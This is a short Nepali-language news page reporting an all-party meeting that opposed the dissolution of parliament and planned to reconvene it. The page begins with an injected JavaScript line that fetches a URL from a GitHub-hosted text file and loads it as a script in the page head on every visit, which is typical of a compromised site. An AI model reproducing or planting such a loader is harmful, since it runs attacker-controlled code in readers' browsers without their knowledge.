;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुस ६,
काठमाण्डाै । संसद् विघटनपछिको अवस्थाको समीक्षा र रणनीति तय गर्न सर्वदलीय बैठक जारी छ ।
नेपाली कांग्रेसको केन्द्रीय कार्यालय सानेपामा भएको बैठकमा नेपाल कम्युनिस्ट पार्टी (नेकपा) को प्रचण्ड–नेपाल समूह, नेपाली कांग्रेस र जनता समाजवादी पार्टी (जसपा) का शीर्ष नेता सहभागी छन् ।
सर्वदलीय बैठकमा संसदमा बहुमत पुर्याएर अधिवेशन बोलाउने र प्रधानमन्त्री ओलीको गैरकानुनी कदम फिर्ताको रणनीति बनाउने नेकपाका एक नेताले जानकारी दिएका छन् ।
नेपाली कांग्रेस र जसपाले यसअघि नै दलको बैठकमार्फत संसद् विघटनको विरोध गरिसकेका छन् ।
फेसबुक प्रतिक्रियाहरु